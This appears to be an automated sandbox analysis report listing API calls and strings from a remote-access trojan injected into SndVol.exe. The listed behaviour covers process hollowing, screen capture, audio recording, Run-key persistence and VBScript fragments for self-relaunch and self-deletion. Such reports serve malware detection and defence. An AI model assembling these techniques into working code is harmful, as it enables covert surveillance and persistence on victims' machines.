API String ID: 2325560087-676759640
Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5

Function 048FB504 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 048FB5F9

Part of subcall function 048F2EF7: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 048F2F06
Part of subcall function 048F2EF7: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,048F311D,?,00000000), ref: 048F2F2E
Part of subcall function 048F2EF7: RegCloseKey.ADVAPI32(00000000,?,?,?,048F311D,?,00000000), ref: 048F2F39

Strings

Control Panel\Desktop, xrefs: 048FB53F, 048FB572, 048FB5C2

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop
API String ID: 4127273184-27424756
Opcode ID: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
Instruction ID: c6e736c06e85b246997185b518e5c435ee12bc25b6d78e2faa1e86b2e15bf0ec
Opcode Fuzzy Hash: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
Instruction Fuzzy Hash: 1311A562F8025033E914343E8D27F6E280A974BB50F940B5AE7026B6C5F8EB7B5553CB

Function 004328FC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
Instruction Fuzzy Hash:

Function 04913694 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00432908,049133C7), ref: 04913699

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
Instruction Fuzzy Hash:

Function 0041642D Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 289libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
GetProcAddress.KERNEL32(00000000), ref: 00416477
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
GetProcAddress.KERNEL32(00000000), ref: 0041648B
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
GetProcAddress.KERNEL32(00000000), ref: 0041649F
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
GetProcAddress.KERNEL32(00000000), ref: 004164B3
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
GetThreadContext.KERNEL32(?,00000000), ref: 00416583
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
SetThreadContext.KERNEL32(?,00000000), ref: 00416766
ResumeThread.KERNEL32(?), ref: 00416773
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
GetCurrentProcess.KERNEL32(?), ref: 00416795
TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
GetLastError.KERNEL32 ref: 004167B8

Strings

ZwUnmapViewOfSection, xrefs: 0041648D
`ou, xrefs: 00416649
ZwCreateSection, xrefs: 0041645A
ntdll, xrefs: 0041645F, 0041647E, 00416492, 004164A6
ZwClose, xrefs: 004164A1
ZwMapViewOfSection, xrefs: 00416479

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`ou$ntdll
API String ID: 4188446516-1235647125
Opcode ID: d10bf65b43118d9f3602471ab8893a8a2e2c8af733416bb1b6f525cf71852451
Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
Opcode Fuzzy Hash: d10bf65b43118d9f3602471ab8893a8a2e2c8af733416bb1b6f525cf71852451
Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A

Function 00416E7E Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 307windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
CreateCompatibleDC.GDI32(00000000), ref: 00416EA5

Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F

CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
DeleteDC.GDI32(00000000), ref: 00416F32
DeleteDC.GDI32(00000000), ref: 00416F35
DeleteObject.GDI32(00000000), ref: 00416F38
SelectObject.GDI32(00000000,00000000), ref: 00416F59
DeleteDC.GDI32(00000000), ref: 00416F6A
DeleteDC.GDI32(00000000), ref: 00416F6D
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
GetIconInfo.USER32(?,?), ref: 00416FC5
DeleteObject.GDI32(?), ref: 00416FF4
DeleteObject.GDI32(?), ref: 00417001
DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
DeleteDC.GDI32(?), ref: 0041713C
DeleteDC.GDI32(00000000), ref: 0041713F
DeleteObject.GDI32(00000000), ref: 00417142
GlobalFree.KERNEL32(?), ref: 0041714D
DeleteObject.GDI32(00000000), ref: 00417201
GlobalFree.KERNEL32(?), ref: 00417208
DeleteDC.GDI32(?), ref: 00417218
DeleteDC.GDI32(00000000), ref: 00417223

Strings

DISPLAY, xrefs: 00416E91

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
String ID: DISPLAY
API String ID: 479521175-865373369
Opcode ID: f4872e5e54956cb8a82cf9cfbe48a4ffd8cadd88bec2254309271a8e236c435d
Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
Opcode Fuzzy Hash: f4872e5e54956cb8a82cf9cfbe48a4ffd8cadd88bec2254309271a8e236c435d
Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A

Function 0040BFDE Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 281registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132

Part of subcall function 0040A7F2: TerminateThread.KERNEL32(Function_00009305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823

Part of subcall function 0041A17B: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA

ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
ExitProcess.KERNEL32 ref: 0040C389

Strings

while fso.FileExists(", xrefs: 0040C1A5
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040C02A
On Error Resume Next, xrefs: 0040C172
open, xrefs: 0040C377
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C2BA
"), xrefs: 0040C18E
H"G, xrefs: 0040C088
t<F, xrefs: 0040C2F0, 0040C331
fso.DeleteFile ", xrefs: 0040C1F3
Temp, xrefs: 0040C139
""", 0, xrefs: 0040C2A0
\update.vbs, xrefs: 0040C134
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040C163
wend, xrefs: 0040C242
fso.DeleteFolder ", xrefs: 0040C264
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040C07B
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040C32C
exepath, xrefs: 0040C0B0

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
API String ID: 1861856835-1953526029
Opcode ID: e03d85ccb791e37cf9ee936b8ea97052e8162eb2640545ba89796c3e5a5ffdfc
Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
Opcode Fuzzy Hash: e03d85ccb791e37cf9ee936b8ea97052e8162eb2640545ba89796c3e5a5ffdfc
Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E

Function 00410EDA Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
ExitProcess.KERNEL32(00000000), ref: 00410F05
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
CloseHandle.KERNEL32(00000000), ref: 00410FA0
GetCurrentProcessId.KERNEL32 ref: 00410FA6
PathFileExistsW.SHLWAPI(?), ref: 00410FD7
GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
lstrcatW.KERNEL32(?,.exe), ref: 00411066

Part of subcall function 0041A17B: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
Sleep.KERNEL32(000001F4), ref: 004110E7
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
CloseHandle.KERNEL32(00000000), ref: 0041110E
GetCurrentProcessId.KERNEL32 ref: 00411114

Strings

.exe, xrefs: 0041105A
H"G, xrefs: 00410F0B
(#G, xrefs: 00410EE8
WDH, xrefs: 00410FAD, 0041111B
temp_, xrefs: 00411048
open, xrefs: 004110A0
exepath, xrefs: 00410F31

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
API String ID: 2649220323-71629269
Opcode ID: a8d6a757d6c84a1f0eca7832635079793fec298f85486a48e58a71666bebe67a
Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
Opcode Fuzzy Hash: a8d6a757d6c84a1f0eca7832635079793fec298f85486a48e58a71666bebe67a
Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D

Function 0040B871 Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 296fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040B882
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
CopyFileW.KERNEL32(C:\Windows\SysWOW64\SndVol.exe,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
_wcslen.LIBCMT ref: 0040B968
CopyFileW.KERNEL32(C:\Windows\SysWOW64\SndVol.exe,00000000,00000000,00000000), ref: 0040B9E0
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
_wcslen.LIBCMT ref: 0040BA25
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
ExitProcess.KERNEL32 ref: 0040BC36

Strings

6, xrefs: 0040B95C
C:\Windows\SysWOW64\SndVol.exe, xrefs: 0040B916, 0040B91B, 0040B94B, 0040B9DA, 0040B9DF, 0040B9E6, 0040BAAA
open, xrefs: 0040BC24
!G, xrefs: 0040B8C6
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040BB57
\install.vbs, xrefs: 0040BA3E
Temp, xrefs: 0040BA43
""", 0, xrefs: 0040BB47
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040BA7B
WScript.Sleep 1000, xrefs: 0040BA6D
!G, xrefs: 0040B8F8
fso.DeleteFile , xrefs: 0040BAB6
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040BBD2

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
String ID: """, 0$6$C:\Windows\SysWOW64\SndVol.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
API String ID: 2743683619-3732349345
Opcode ID: f87a18f2027e9c8a5bd836a64d924950c6696084ec6eab3a6acea56cc96b6069
Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
Opcode Fuzzy Hash: f87a18f2027e9c8a5bd836a64d924950c6696084ec6eab3a6acea56cc96b6069
Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E

Function 0040BC59 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 259registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5

Part of subcall function 0040A7F2: TerminateThread.KERNEL32(Function_00009305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823

Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,756F3530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980

ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
ExitProcess.KERNEL32 ref: 0040BFD7

Strings

while fso.FileExists(", xrefs: 0040BE86
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040BCA5
On Error Resume Next, xrefs: 0040BE52
open, xrefs: 0040BFCA
H"G, xrefs: 0040BD1C
.vbs, xrefs: 0040BDBF
"), xrefs: 0040BE6F
pth_unenc, xrefs: 0040BC60
fso.DeleteFile ", xrefs: 0040BED3
Temp, xrefs: 0040BE04
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040BE43
05ou`ou, xrefs: 0040BD8F
wend, xrefs: 0040BF22
fso.DeleteFolder ", xrefs: 0040BF48
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040BCF6
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040BF7F
exepath, xrefs: 0040BD3F

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$05ou`ou$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-1694455850
Opcode ID: 521aa4a3e546d1a4d3419418fe6985cfdd2c175cfdb62105b2479dc31bcbb342
Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
Opcode Fuzzy Hash: 521aa4a3e546d1a4d3419418fe6985cfdd2c175cfdb62105b2479dc31bcbb342
Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E

Function 00418FFD Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
SetEvent.KERNEL32 ref: 004191CF
WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
CloseHandle.KERNEL32 ref: 004191F0
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C

Strings

resume audio, xrefs: 00419198
status audio mode, xrefs: 004191AD
" type , xrefs: 0041908B
pause audio, xrefs: 00419180
close audio, xrefs: 00419217
play audio, xrefs: 00419101
stopped, xrefs: 004191B8
open ", xrefs: 00419086
stop audio, xrefs: 0041920D
alias audio, xrefs: 0041906E

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
API String ID: 738084811-1354618412
Opcode ID: 7ee231967584c923912fc0a6995a0b1496ba2b121e3e8896045f64c6575b1494
Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
Opcode Fuzzy Hash: 7ee231967584c923912fc0a6995a0b1496ba2b121e3e8896045f64c6575b1494
Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E

Function 00401A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7

Strings

WAVE, xrefs: 00401AFD
RIFF, xrefs: 00401ADD
fmt , xrefs: 00401B0D
data, xrefs: 00401B91

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3

Function 0044C60D Relevance: 25.9, APIs: 17, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044C69F
_free.LIBCMT ref: 0044C6C5
_free.LIBCMT ref: 0044C6EE
_free.LIBCMT ref: 0044C726
_free.LIBCMT ref: 0044C757
_free.LIBCMT ref: 0044C798
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044C819
_free.LIBCMT ref: 0044C832
_wcschr.LIBVCRUNTIME ref: 0044C86F
_free.LIBCMT ref: 0044C8DB
_free.LIBCMT ref: 0044C901
_free.LIBCMT ref: 0044C92A
_free.LIBCMT ref: 0044C95F
_free.LIBCMT ref: 0044C990
_free.LIBCMT ref: 0044C9D1
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044CA56
_free.LIBCMT ref: 0044CA6F

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID:
API String ID: 3899193279-0
Opcode ID: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
Opcode Fuzzy Hash: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D

Function 0044E4A6 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0044E4EA

Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7

_free.LIBCMT ref: 0044E4DF

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 0044E501
_free.LIBCMT ref: 0044E516
_free.LIBCMT ref: 0044E521
_free.LIBCMT ref: 0044E543
_free.LIBCMT ref: 0044E556
_free.LIBCMT ref: 0044E564
_free.LIBCMT ref: 0044E56F
_free.LIBCMT ref: 0044E5A7
_free.LIBCMT ref: 0044E5AE
_free.LIBCMT ref: 0044E5CB
_free.LIBCMT ref: 0044E5E3

Strings

pF, xrefs: 0044E4BC

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: pF
API String ID: 161543041-2973420481
